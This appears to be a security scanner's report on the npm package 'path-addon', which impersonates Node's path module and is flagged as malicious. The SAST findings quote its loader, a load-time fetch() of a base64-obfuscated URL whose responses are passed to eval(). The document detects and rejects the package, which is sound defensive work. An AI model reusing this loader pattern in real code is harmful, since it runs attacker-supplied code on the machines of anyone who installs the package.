path-addon @1.0.1
Node.js path module
Maintainers
Dependencies (7)
| Package | Constraint | Registry Status |
|---|---|---|
| fs | ^0.0.1-security | auto_approved |
| path | ^0.12.7 | auto_approved |
| util | ^0.10.3 | auto_approved |
| axios | ^1.4.0 | auto_approved |
| execp | ^0.0.1 | auto_approved |
| process | ^0.11.1 | auto_approved |
| request | ^2.88.2 | No greenflagged match |
Transitive Dependency Tree
Risk Dispositions (2 applicable to this version, 1 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
semgrep:toplevel-fetch |
semgrep | reject | AI | AI (semgrep): Fetches obfuscated remote URL at module load; exfiltration/RCE vector. Generalizes to all versions of this package. | |
semgrep:eval-usage |
semgrep | reject | AI | AI (semgrep): eval()s remotely fetched payload; arbitrary code execution. Generalizes to all versions of this package. |
Show 1 disposition(s) that do not match any finding on this version
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
bogus-package |
bogus-package | reject | AI | AI (bogus-package): No repo, no keywords, inflated semver — consistent with a malicious impersonation package. |
SAST Findings (4)
[Always reject] Top-level fetch() call — could indicate telemetry or data exfiltration at module load 572 | }; 573 | > 574 | fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9YT0ZKMg==")) 575 | .then(response => response.json()) 576 | .then(data => {
[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 576 | .then(data => { 577 | const codeOne = data.one; > 578 | eval(codeOne); 579 | const codeTwo = data.two; 580 | eval(codeTwo);
[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 578 | eval(codeOne); 579 | const codeTwo = data.two; > 580 | eval(codeTwo); 581 | }) 582 | .catch(error => console.error('Error fetching or executing code:', error));
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 151). Findings: 3 critical (+120), 1 medium (+10), 7 low (+21), 1 info (+0).
Published to npm: